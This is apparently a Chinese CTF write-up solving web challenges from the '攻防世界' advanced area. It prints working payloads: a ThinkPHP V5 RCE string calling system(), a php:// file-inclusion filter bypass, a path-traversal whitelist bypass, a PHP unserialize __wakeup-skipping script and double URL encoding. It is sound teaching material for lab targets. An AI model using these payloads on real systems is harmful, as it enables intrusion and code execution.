IMWJING
IMWJING

攻防世界--WEB高手进阶区(持续更新)

目录

  • baby_web
  • Training-WWW-Robots
  • php_rce
  • Web_php_include
  • warmup
  • Web_php_unserialize
  • NaNNaNNaNNaN-Batman
  • php2

baby_web

打开链接,只看到HELLO WORLD,
攻防世界--WEB高手进阶区(持续更新)_第1张图片
根据题目描述:想想初始页面是哪个,想到index.php,将url改成http://111.198.29.45:46872/index.php后发现页面仍然是1.php,用burp拦截数据包,
攻防世界--WEB高手进阶区(持续更新)_第2张图片
进行Repeater,得到flag。
攻防世界--WEB高手进阶区(持续更新)_第3张图片

Training-WWW-Robots

打开链接,
攻防世界--WEB高手进阶区(持续更新)_第4张图片
根据题目,猜想题目关键点为robots.txt,访问robots.txt,
攻防世界--WEB高手进阶区(持续更新)_第5张图片
根据页面提示,访问/fl0g.php得到flag。
攻防世界--WEB高手进阶区(持续更新)_第6张图片

php_rce

打开链接,
攻防世界--WEB高手进阶区(持续更新)_第7张图片
根据题目和页面显示,该题目关键点为ThinkPHP V5 rce漏洞,根据网上的payload进行修改后得到flag。
payload如下:

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r 'system("cat ../../../flag");'

在这里插入图片描述

Web_php_include

打开链接,是一段php代码,


show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

攻防世界--WEB高手进阶区(持续更新)_第8张图片
关键点在文件包含php://伪协议和strstr()函数绕过,php://input 是个可以访问请求的原始数据的只读流,可以读取POST数据流。
strstr()查找字符串的首次出现,采用大小写绕过。
攻防世界--WEB高手进阶区(持续更新)_第9张图片攻防世界--WEB高手进阶区(持续更新)_第10张图片

warmup

打开链接,
攻防世界--WEB高手进阶区(持续更新)_第11张图片F12看到source.php,访问source.php查看源码,

 
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            //白名单,传入参数为source.php或hint.php则返回真,否则继续判断
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];  
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }
           //取传进参数首次出现?前的部分,再进行白名单判断,否则继续向下判断。
            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            //进去的参数做urldecode,再进行上面的判断。
            $_page = urldecode($page);  
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }
    //检查变量是否为空,是否为字符串,通过函数进行检查。
    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

审计代码看到hint.php,访问hint.php,
在这里插入图片描述
构造payload:source.php?file=hint.php?/../../../../ffffllllaaaagggg,得到flag。
攻防世界--WEB高手进阶区(持续更新)_第12张图片

Web_php_unserialize

打开链接,是代码审计题,分析代码,

 
class Demo {                       
    private $file = 'index.php';   
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { //__wakeup()是用在反序列化操作中。unserialize()会检查存在一个__wakeup()方法。如果存在,则先会调用__wakeup()方法。
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']);   //将传入的var的值进行base64解码
    if (preg_match('/[oc]:\d+:/i', $var)) {   //正则匹配
        die('stop hacking!'); 
    } else {
        @unserialize($var);     //将var反序列化
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

编写脚本,

 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
$A = new Demo('fl4g.php');
$B = serialize($A);
//echo $B;
$C = str_replace('O:4','O:+4',$B);   //使用+绕过preg_match的正则表达式
//echo $C;
$D = str_replace(':1:',':2:',$C);    //当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行
//echo $D;
$E = base64_encode($D);//base64编码获取序列化的结果
echo $E;
?>

攻防世界--WEB高手进阶区(持续更新)_第13张图片将base64编码get传参得到flag。
?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

NaNNaNNaNNaN-Batman

下载附件,用浏览器打开,是一个输入框,
攻防世界--WEB高手进阶区(持续更新)_第14张图片分析源码,是一堆乱码,
攻防世界--WEB高手进阶区(持续更新)_第15张图片最后有一个eval函数,将‘’中的代码执行了,将eval改为alert进行弹窗,得到源码。
攻防世界--WEB高手进阶区(持续更新)_第16张图片整理之后得到,

function $(){
var e=document.getElementById("c").value;if(e.length==16)
	if(e.match(/^be0f23/)!=null)
		if(e.match(/233ac/)!=null)
			if(e.match(/e98aa$/)!=null)
				if(e.match(/c7be9/)!=null){
					var t=["fl","s_a","i","e}"];
					var n=["a","_h0l","n"];
					var r=["g{","e","_0"];
					var i=["it'","_","n"];
					var s=[t,n,r,i];
					for(var o=0;o<13;++o){
						document.write(s[o%4][0]);
						s[o%4].splice(0,1)
						}
					}
				}
document.write('');
delete _

当满足if条件时,就可以flag,输入be0f233ac7be98aa,
在这里插入图片描述攻防世界--WEB高手进阶区(持续更新)_第17张图片

php2

打开链接,
攻防世界--WEB高手进阶区(持续更新)_第18张图片
毫无思路,看了大佬文章之后才知道index.phps源码泄露,
攻防世界--WEB高手进阶区(持续更新)_第19张图片查看页面源代码进行分析,
攻防世界--WEB高手进阶区(持续更新)_第20张图片

第一个条件:"admin"===$_GET[id]不成立,
第二个条件:经过url解码后要使得$_GET[id]=='''admin'成立

因此对admin进行url编码(需进行两个编码),
?id=%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65得到flag。
攻防世界--WEB高手进阶区(持续更新)_第21张图片

你可能感兴趣的:(CTF)

  • 【2025年春季】全国CTF夺旗赛-从零基础入门到竞赛,看这一篇就稳了! 白帽子凯哥 web安全学习安全CTF夺旗赛网络安全
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包目录一、CTF简介二、CTF竞赛模式三、CTF各大题型简介四、CTF学习路线4.1、初期1、html+css+js(2-3天)2、apache+php(4-5天)3、mysql(2-3天)4、python(2-3天)5、burpsuite(1-2天)4.2、中期1、SQL注入(7-8天)2、文件上传(7-8天)3、其他漏洞(14-15
  • arm centos7 安装mysql5.7 qq_42331499 mysqllinux数据库
    ARM架构下安装MySQL-学习日记ARM64架构下安装mysql5.7.22的全过程_Mysql_脚本之家错误信息:InstallingMySQLsystemtables..../bin/mysqld:errorwhileloadingsharedlibraries:libaio.so.1:cannotopensharedobjectfile:Nosuchfileordirectory解决办法:
  • 信号处理基础:信号的时域和频域分析_(9).傅里叶变换 kkchenkx 信号处理技术仿真模拟信号处理
    傅里叶变换引言傅里叶变换是一种将信号从时域转换到频域的数学工具。通过傅里叶变换,可以将复杂的时域信号分解为一系列简单的基本频率分量,这对于信号的分析、处理和设计具有重要意义。傅里叶变换在信号处理领域有着广泛的应用,包括滤波、频谱分析、通信系统设计等。傅里叶级数连续时间傅里叶级数(CTFS)连续时间傅里叶级数(Continuous-TimeFourierSeries,CTFS)是一种将周期性连续时间
  • Angular Superresolution of Real Aperture Radar Using Online Detect-Before-Reconstruct Framework 论文阅读 青铜锁00 论文阅读Radar论文阅读
    AngularSuperresolutionofRealApertureRadarUsingOnlineDetect-Before-ReconstructFramework1.论文的研究目标与实际问题意义1.1研究目标1.2实际问题与产业意义2.论文的创新方法、模型与公式分析(重点)2.1核心创新点2.2关键公式与模型2.2.1信号模型2.2.2稀疏正则化优化问题2.2.3坐标循环最小化2.2.4
  • Pwntools 的详细介绍、安装指南、配置说明 程序员的世界你不懂 效率工具提升百度新浪微博
    Pwntools:Python开源安全工具箱一、Pwntools简介Pwntools是一个由Securityresearcher开发的高效Python工具库,专为密码学研究、漏洞利用、协议分析和逆向工程设计。它集成了数百个底层工具的功能,提供统一的PythonAPI接口,广泛用于CTF竞赛、渗透测试和安全开发。其核心优势包括:模块化设计:支持密码学、网络协议、shellcode生成等全栈操作跨平台
  • 学习dify第二天-web下篇 一直走下去-明 next.jsdify源码学习学习前端react.js前端框架
    学习dify第二天-web下篇引言web目录结构配置入口文件分析下怎么封装的请求最后总结:参考阅读:React基础用next.js写个页面跳转的应用seo搜索引擎优化引言react:ReactFoundations:AboutReactandNext.js|Next.js如果不会next.js可以先看看这个,不看其实也没关系,学下思路也可以。next_web小demoweb目录结构*mocks*:
  • Linux系统关于Qt platform plugin “xcb“缺失的解决 chase。 Bug调试linuxqtdebian
    之前在Debian10.0系统中安装图形库(如QT)相关时出现xcb缺失、xinerama缺失的问题。qt.qpa.plugin:CouldnotloadtheQtplatformplugin"xcb"in""eventhoughitwasfound.libxcb-xinerama.so.0:cannotopensharedobjectfile:Nosuchfileordirectory在~/.b
  • CTF-web: Rust 的过程宏 A5rZ rust网络安全
    Rust的过程宏(ProceduralMacros)是一种强大的元编程工具,允许你在编译时对代码进行操作和生成。与属性宏和派生宏不同,过程宏可以接收并处理任意Rust代码,生成新的代码片段。这里有一个简单的例子来说明Rust的过程宏。假设你想创建一个过程宏来生成一个函数,该函数返回一个固定的字符串。我们可以按如下步骤进行:创建一个新的Rust库项目:cargonewmy_proc_macro--l
  • layui获取select 文本_layui select获取自定义属性方法 weixin_39716264 layui获取select文本
    在layui里面给了特定几个自定义属性title请选择属性雪碧芬达冰糖雪梨金贝监听selectform.on('select(sadas)',function(data){console.log(data.elem);//得到select原始dom对象console.log(data.value);//得到被选中的值console.log(data.elem[data.elem.selectedi
  • 封装el-select滚动底部加载更多 心肝到爆 前端vue.jselementui前端javascriptcss3前端框架
    封装el-select滚动底部加载更多vue2实现el-select下拉列表滚动加载更多数据父组件页面使用importLoadMoreSelectfrom"../components/LoadMoreSelect/index.vue";import{mapActions}from"vuex";exportdefault{name:"LoadMore",components:{LoadMoreSel
  • PostgreSQL用户创建删除及error while loading shared libraries解决方法 socrates 数据库PostgreSQLLinuxPostgreSQL系列postgresqllibraryattributespathlinuxuser
    1.为数据库创建一个pg_test_user用户;[root@kevinlib]#su-postgres[postgres@kevin~]$createuserpg_test_usercreateuser:errorwhileloadingsharedlibraries:libpq.so.5:cannotopensharedobjectfile:Nosuchfileordirectory上面显示没
  • 【2025年】全国CTF夺旗赛-从零基础入门到竞赛,看这一篇就稳了! 白帽黑客鹏哥 web安全CTF网络安全大赛pythonLinux
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包目录一、CTF简介二、CTF竞赛模式三、CTF各大题型简介四、CTF学习路线4.1、初期1、html+css+js(2-3天)2、apache+php(4-5天)3、mysql(2-3天)4、python(2-3天)5、burpsuite(1-2天)4.2、中期1、SQL注入(7-8天)2、文件上传(7-8天)3、其他漏洞(14-15
  • 模板分享:树状数组 pystraf 数据结构与算法#数据结构算法数据结构c++
    Codeintlowbit(intx){returnx&-x;}templatestructfenwick{intn;vectorc;fenwick(){}fenwick(int_n):n(_n){c.resize(n+1);}fenwick(constvector&a):n(a.size()){c.resize(n+1);for(inti=1;i::fenwick(intn);初始化一个大小为n
  • React面试(一) 束尘 vue.jsjavascript前端react.js
    文章目录1.vue和react有什么异同2.useEffect中为什么不能使用异步3.useEffect和useLayoutEffect的区别4.react的生命周期5.state和prop的区别6.受控组件和非受控组件7.为什么react16之后不把事件挂载到document上了8.讲一下react的hoc,它可以用来做什么?9.讲一下对reactfiber的理解10.讲一下react.comp
  • 2025年CTF夺旗赛-从零基础入门到竞赛,看这一篇就稳了! 白帽安全-黑客4148 网络安全web安全linux密码学CTF
    目录一、CTF简介二、CTF竞赛模式三、CTF各大题型简介四、CTF学习路线4.1、初期1、html+css+js(2-3天)2、apache+php(4-5天)3、mysql(2-3天)4、python(2-3天)5、burpsuite(1-2天)4.2、中期1、SQL注入(7-8天)2、文件上传(7-8天)3、其他漏洞(14-15天)4.3、后期五、CTF学习资源5.1、CTF赛题复现平台5.
  • buuctf-变异凯撒 qis_qis crypto其他
    凯撒密码作为最古老的密码体制之一,相信大多数人都知道,即简单的移位操作,那么问题来了,变异的凯撒密码又会是什么呢?拿到题先比对acsii码值对比表:acsii码通过上面的acsii码值对比表可以看到第一个字符向后移了5,第二个向后移了6,第三个向后移了7,以此类推,很容易想到变异凯撒即每个向后移的位数是前一个加1:str="afZ_r9VYfScOeO_UL^RWUc"k=5foriinstr:p
  • buuctf-Quoted-printable qis_qis crypto
    解压打开:=E9=82=A3=E4=BD=A0=E4=B9=9F=E5=BE=88=E6=A3=92=E5=93=A6刚开始看到这一个字符串,误以为是什么编码特有的格式直到后面发现标题即提示,即Quoted-printable也是一种编码:得到flag:那你也很棒哦
  • 基于Matlab的脑功能网络工具箱 BCT & FCLab 脑电信号要分类 脑电信号识别
    基于Matlab的脑功能网络工具箱BCT&FCLab1.下载BCT:https://www.nitrc.org/projects/bctFCLab:https://github.com/ramsys28/FCLAB2.位置放置将下载好的FCLab文件夹放在EEGLAB文件下下的plugins,然后将BCT文件夹放在FCLab文件夹下,如下图:3.测试打开matlab设置路径里添加FCLab文件夹及
  • 网络渗透测试实验四:CTF实践 肆—— 渗透作业网络
    1.实验目的和要求实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTPweb服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。系统环境:KaliLinux2、WebDeveloper靶机来源:https://www.vulnhub.co
  • 深入了解React Fiber:React的新架构 糖糖老师436 react.js架构前端
    ReactFiber是React16引入的一种全新的协调引擎,旨在解决旧版React在性能和灵活性方面的不足。本文将深入探讨ReactFiber的工作原理、其背后的设计理念,以及它如何提升应用的性能。我们会用通俗易懂的语言,帮助你轻松理解这个复杂的概念,并通过代码示例来进一步解释。1.什么是ReactFiber?ReactFiber是对React核心算法的一次彻底重构。旧版的React使用的是“S
  • ctf网络安全大赛官网赛题 ctf网络安全大赛规则 网络安全-老纪 web安全安全网络
    CTF(CaptureTheFlag,夺旗赛)起源于1996年DEFCON全球黑客大会,是网络安全爱好者之间的竞技游戏。CTF竞赛模式具体分为以下三类:一、解题模式(Jeopardy)在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、漏洞挖掘与
  • Python的子线程与主线程之间的通信并通知主线程更新UI 银河护卫队长 python开发语言
    新建PLC类PLC.pyimportjsonimporttimefromthreadingimportThreadfromHslCommunicationimportSiemensS7Net,SiemensPLCSfromPySide6.QtCoreimportQThread,Signal,QObjectfromtdm.MsgTypeimportMSG_TYPE_LOG,MSG_TYPE_MSGB
  • Java 常见的面试题(设计模式) web_15534274656 面试学习路线阿里巴巴java设计模式开发语言
    一、说一下你熟悉的设计模式?**设计模式:**是一套被反复使用的代码设计经验的总结(情境中一个问题经过证实的一个解决方案)。使用设计模式是为了可重用代码、让代码更容易被他人理解、保证代码可靠性。设计模式使人们可以更加简单方便的复用成功的设计和体系结构。将已证实的技术表述成设计模式也会使新系统开发者更加容易理解其设计思路。**创建型:**AbstractFactory(抽象工厂模式),Builder
  • V2022全栈培训笔记(WEB攻防47-WEB攻防-通用漏洞&Java反序列化&EXP生成&数据提取&组件安全) 网安李李 笔记前端javaweb安全课程设计python安全
    第47天WEB攻防-通用漏洞&Java反序列化&EXP生成&数据提取&组件安全知识点:1、Java反序列化演示-原生API接☐2、Java反序列化漏洞利用-Ysoserial使用3、Java反序列化漏洞发现利用点-函数&数据4、Java反序列化考点-真实&CTF赛题-审计分析#内容点:1、明白Java反序列化原理2、判断Java反序列化漏洞3、学会-Ysoserial_工具使用4、学会-Seria
  • 23种设计模式之《外观模式(Facade)》在c#中的应用及理解 yuanpan 外观模式设计模式c#开发语言
    程序设计中的主要设计模式通常分为三大类,共23种:1.创建型模式(CreationalPatterns)单例模式(Singleton):确保一个类只有一个实例,并提供全局访问点。工厂方法模式(FactoryMethod):定义创建对象的接口,由子类决定实例化哪个类。抽象工厂模式(AbstractFactory):提供一个创建一系列相关或依赖对象的接口,而无需指定具体类。建造者模式(Builder)
  • Framebuffer,Xorg,directFB,openGL,QT,GTK关系 tianziczj 其他待整理qtgtklinux图形libraryoutput
    本文待整理!!!问:Xserver使用的是Framebuffer吗?答:Xserver有多种实现,如Xfree86、Xorg等,Xfree86默认不采用Framebuffer;而对于Xorg,可以根据xorg.conf里的配置判断如-Section"Device"-Identifier"ConfiguredVideoDevice"-Driver"fbdev"-EndSection其中的fbdev表
  • 【2025年】全国CTF夺旗赛-从零基础入门到竞赛,看这一篇就稳了! 网安詹姆斯 web安全CTF网络安全大赛pythonlinux
    【2025年】全国CTF夺旗赛-从零基础入门到竞赛,看这一篇就稳了!基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包目录一、CTF简介二、CTF竞赛模式三、CTF各大题型简介四、CTF学习路线4.1、初期1、html+css+js(2-3天)2、apache+php(4-5天)3、mysql(2-3天)4、python(2-3天)5、burpsuite(1-2天)4.2、中期1、S
  • c语言scanf_s函数详解,scanf_s()函数 长颈鹿很忙 c语言scanf_s函数详解
    scanf_s()或scanf()函数从标准输入读取数据,并根据格式控制字符串中的格式说明符将它们转换为一个或多个值。scanf_s()函数的原型如下:intscanf_s(constchar*restrictformat,...);scanf()函数也有一个类似的原型。scanf()和scanf_s()之间的区别是:后者需要两个参数,每个输入数据由c,s和[说明符,前者只需要一个参数。格式控制字
  • SQL 多表查询 嵌套查询 A 坐在山顶看猪飞 mysql
    多表查询1、结构:selectfromWHERE2、笛卡尔积查询select*fromstudent,courseselect*fromstudent,sdept3、查询每个学院的学生情况select*fromstudent,sdeptwherestudent.deptno=sdept.deptno4、查询计算机学院所有的学生记录select*fromstudent,sdeptwherestude
  • 23种设计模式之《桥接模式(Bridge)》在c#中的应用及理解 yuanpan 设计模式桥接模式c#开发语言
    程序设计中的主要设计模式通常分为三大类,共23种:1.创建型模式(CreationalPatterns)单例模式(Singleton):确保一个类只有一个实例,并提供全局访问点。工厂方法模式(FactoryMethod):定义创建对象的接口,由子类决定实例化哪个类。抽象工厂模式(AbstractFactory):提供一个创建一系列相关或依赖对象的接口,而无需指定具体类。建造者模式(Builder)
  • 关于旗正规则引擎中的MD5加密问题 何必如此 jspMD5规则加密
    一般情况下,为了防止个人隐私的泄露,我们都会对用户登录密码进行加密,使数据库相应字段保存的是加密后的字符串,而非原始密码。 在旗正规则引擎中,通过外部调用,可以实现MD5的加密,具体步骤如下: 1.在对象库中选择外部调用,选择“com.flagleader.util.MD5”,在子选项中选择“com.flagleader.util.MD5.getMD5ofStr({arg1})”; 2.在规
  • 【Spark101】Scala Promise/Future在Spark中的应用 bit1129 Promise
    Promise和Future是Scala用于异步调用并实现结果汇集的并发原语,Scala的Future同JUC里面的Future接口含义相同,Promise理解起来就有些绕。等有时间了再仔细的研究下Promise和Future的语义以及应用场景,具体参见Scala在线文档:http://docs.scala-lang.org/sips/completed/futures-promises.html
  • spark sql 访问hive数据的配置详解 daizj spark sqlhivethriftserver
    spark sql 能够通过thriftserver 访问hive数据,默认spark编译的版本是不支持访问hive,因为hive依赖比较多,因此打的包中不包含hive和thriftserver,因此需要自己下载源码进行编译,将hive,thriftserver打包进去才能够访问,详细配置步骤如下:   1、下载源码   2、下载Maven,并配置 此配置简单,就略过
  • HTTP 协议通信 周凡杨 javahttpclienthttp通信
                            一:简介  HTTPCLIENT,通过JAVA基于HTTP协议进行点与点间的通信!     二: 代码举例      测试类: import java
  • java unix时间戳转换 g21121 java
    把java时间戳转换成unix时间戳: Timestamp appointTime=Timestamp.valueOf(new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new Date())) SimpleDateFormat df = new SimpleDateFormat("yyyy-MM-dd hh:m
  • web报表工具FineReport常用函数的用法总结(报表函数) 老A不折腾 web报表finereport总结
    说明:本次总结中,凡是以tableName或viewName作为参数因子的。函数在调用的时候均按照先从私有数据源中查找,然后再从公有数据源中查找的顺序。   CLASS CLASS(object):返回object对象的所属的类。   CNMONEY CNMONEY(number,unit)返回人民币大写。 number:需要转换的数值型的数。 unit:单位,
  • java jni调用c++ 代码 报错 墙头上一根草 javaC++jni
    # # A fatal error has been detected by the Java Runtime Environment: # #  EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x00000000777c3290, pid=5632, tid=6656 # # JRE version: Java(TM) SE Ru
  • Spring中事件处理de小技巧 aijuans springSpring 教程Spring 实例Spring 入门Spring3
    Spring 中提供一些Aware相关de接口,BeanFactoryAware、 ApplicationContextAware、ResourceLoaderAware、ServletContextAware等等,其中最常用到de匙ApplicationContextAware.实现ApplicationContextAwaredeBean,在Bean被初始后,将会被注入 Applicati
  • linux shell ls脚本样例 annan211 linuxlinux ls源码linux 源码
    #! /bin/sh - #查找输入文件的路径 #在查找路径下寻找一个或多个原始文件或文件模式 # 查找路径由特定的环境变量所定义 #标准输出所产生的结果 通常是查找路径下找到的每个文件的第一个实体的完整路径 # 或是filename :not found 的标准错误输出。 #如果文件没有找到 则退出码为0 #否则 即为找不到的文件个数 #语法 pathfind [--
  • List,Set,Map遍历方式 (收集的资源,值得看一下) 百合不是茶 listsetMap遍历方式
    List特点:元素有放入顺序,元素可重复 Map特点:元素按键值对存储,无放入顺序 Set特点:元素无放入顺序,元素不可重复(注意:元素虽然无放入顺序,但是元素在set中的位置是有该元素的HashCode决定的,其位置其实是固定的) List接口有三个实现类:LinkedList,ArrayList,Vector LinkedList:底层基于链表实现,链表内存是散乱的,每一个元素存储本身
  • 解决SimpleDateFormat的线程不安全问题的方法 bijian1013 javathread线程安全
    在Java项目中,我们通常会自己写一个DateUtil类,处理日期和字符串的转换,如下所示: public class DateUtil01 { private SimpleDateFormat dateformat = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); public void format(Date d
  • http请求测试实例(采用fastjson解析) bijian1013 http测试
            在实际开发中,我们经常会去做http请求的开发,下面则是如何请求的单元测试小实例,仅供参考。 import java.util.HashMap; import java.util.Map; import org.apache.commons.httpclient.HttpClient; import
  • 【RPC框架Hessian三】Hessian 异常处理 bit1129 hessian
    RPC异常处理概述   RPC异常处理指是,当客户端调用远端的服务,如果服务执行过程中发生异常,这个异常能否序列到客户端?   如果服务在执行过程中可能发生异常,那么在服务接口的声明中,就该声明该接口可能抛出的异常。   在Hessian中,服务器端发生异常,可以将异常信息从服务器端序列化到客户端,因为Exception本身是实现了Serializable的
  • 【日志分析】日志分析工具 bit1129 日志分析
    1. 网站日志实时分析工具 GoAccess http://www.vpsee.com/2014/02/a-real-time-web-log-analyzer-goaccess/ 2. 通过日志监控并收集 Java 应用程序性能数据(Perf4J) http://www.ibm.com/developerworks/cn/java/j-lo-logforperf/ 3.log.io 和
  • nginx优化加强战斗力及遇到的坑解决 ronin47 nginx 优化
       先说遇到个坑,第一个是负载问题,这个问题与架构有关,由于我设计架构多了两层,结果导致会话负载只转向一个。解决这样的问题思路有两个:一是改变负载策略,二是更改架构设计。    由于采用动静分离部署,而nginx又设计了静态,结果客户端去读nginx静态,访问量上来,页面加载很慢。解决:二者留其一。最好是保留apache服务器。      来以下优化:      
  • java-50-输入两棵二叉树A和B,判断树B是不是A的子结构 bylijinnan java
    思路来自: http://zhedahht.blog.163.com/blog/static/25411174201011445550396/ import ljn.help.*; public class HasSubtree { /**Q50. * 输入两棵二叉树A和B,判断树B是不是A的子结构。 例如,下图中的两棵树A和B,由于A中有一部分子树的结构和B是一
  • mongoDB 备份与恢复 开窍的石头 mongDB备份与恢复
    Mongodb导出与导入 1: 导入/导出可以操作的是本地的mongodb服务器,也可以是远程的. 所以,都有如下通用选项: -h host   主机 --port port    端口 -u username 用户名 -p passwd   密码 2: mongoexport 导出json格式的文件
  • [网络与通讯]椭圆轨道计算的一些问题 comsci 网络
         如果按照中国古代农历的历法,现在应该是某个季节的开始,但是由于农历历法是3000年前的天文观测数据,如果按照现在的天文学记录来进行修正的话,这个季节已经过去一段时间了。。。。。       也就是说,还要再等3000年。才有机会了,太阳系的行星的椭圆轨道受到外来天体的干扰,轨道次序发生了变
  • 软件专利如何申请 cuiyadll 软件专利申请
    软件技术可以申请软件著作权以保护软件源代码,也可以申请发明专利以保护软件流程中的步骤执行方式。专利保护的是软件解决问题的思想,而软件著作权保护的是软件代码(即软件思想的表达形式)。例如,离线传送文件,那发明专利保护是如何实现离线传送文件。基于相同的软件思想,但实现离线传送的程序代码有千千万万种,每种代码都可以享有各自的软件著作权。申请一个软件发明专利的代理费大概需要5000-8000申请发明专利可
  • Android学习笔记 darrenzhu android
    1.启动一个AVD 2.命令行运行adb shell可连接到AVD,这也就是命令行客户端 3.如何启动一个程序   am start -n package name/.activityName   am start -n com.example.helloworld/.MainActivity 启动Android设置工具的命令如下所示: # am start -
  • apache虚拟机配置,本地多域名访问本地网站 dcj3sjt126com apache
    现在假定你有两个目录,一个存在于 /htdocs/a,另一个存在于 /htdocs/b 。 现在你想要在本地测试的时候访问 www.freeman.com 对应的目录是 /xampp/htdocs/freeman ,访问 www.duchengjiu.com 对应的目录是 /htdocs/duchengjiu。 1、首先修改C盘WINDOWS\system32\drivers\etc目录下的
  • yii2 restful web服务[速率限制] dcj3sjt126com PHPyii2
    速率限制 为防止滥用,你应该考虑增加速率限制到您的API。 例如,您可以限制每个用户的API的使用是在10分钟内最多100次的API调用。 如果一个用户同一个时间段内太多的请求被接收, 将返回响应状态代码 429 (这意味着过多的请求)。 要启用速率限制, [[yii\web\User::identityClass|user identity class]] 应该实现 [[yii\filter
  • Hadoop2.5.2安装——单机模式 eksliang hadoophadoop单机部署
    转载请出自出处:http://eksliang.iteye.com/blog/2185414 一、概述        Hadoop有三种模式 单机模式、伪分布模式和完全分布模式,这里先简单介绍单机模式 ,默认情况下,Hadoop被配置成一个非分布式模式,独立运行JAVA进程,适合开始做调试工作。   二、下载地址 Hadoop 网址http:
  • LoadMoreListView+SwipeRefreshLayout(分页下拉)基本结构 gundumw100 android
    一切为了快速迭代 import java.util.ArrayList; import org.json.JSONObject; import android.animation.ObjectAnimator; import android.os.Bundle; import android.support.v4.widget.SwipeRefreshLayo
  • 三道简单的前端HTML/CSS题目 ini htmlWeb前端css题目
    使用CSS为多个网页进行相同风格的布局和外观设置时,为了方便对这些网页进行修改,最好使用( )。http://hovertree.com/shortanswer/bjae/7bd72acca3206862.htm   在HTML中加入<table style=”color:red; font-size:10pt”>,此为( )。http://hovertree.com/s
  • overrided方法编译错误 kane_xie override
    问题描述: 在实现类中的某一或某几个Override方法发生编译错误如下: Name clash: The method put(String) of type XXXServiceImpl has the same erasure as put(String) of type XXXService but does not override it   当去掉@Over
  • Java中使用代理IP获取网址内容(防IP被封,做数据爬虫) mcj8089 免费代理IP代理IP数据爬虫JAVA设置代理IP爬虫封IP
    推荐两个代理IP网站:   1. 全网代理IP:http://proxy.goubanjia.com/   2. 敲代码免费IP:http://ip.qiaodm.com/   Java语言有两种方式使用代理IP访问网址并获取内容,   方式一,设置System系统属性   // 设置代理IP System.getProper
  • Nodejs Express 报错之 listen EADDRINUSE qiaolevip 每天进步一点点学习永无止境nodejs纵观千象
    当你启动 nodejs服务报错: >node app Express server listening on port 80 events.js:85 throw er; // Unhandled 'error' event ^ Error: listen EADDRINUSE at exports._errnoException (
  • C++中三种new的用法 _荆棘鸟_ C++new
    转载自:http://news.ccidnet.com/art/32855/20100713/2114025_1.html 作者: mt 其一是new operator,也叫new表达式;其二是operator new,也叫new操作符。这两个英文名称起的也太绝了,很容易搞混,那就记中文名称吧。new表达式比较常见,也最常用,例如: string* ps = new string("
  • Ruby深入研究笔记1 wudixiaotie Ruby
    module是可以定义private方法的 module MTest def aaa puts "aaa" private_method end private def private_method puts "this is private_method" end end
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他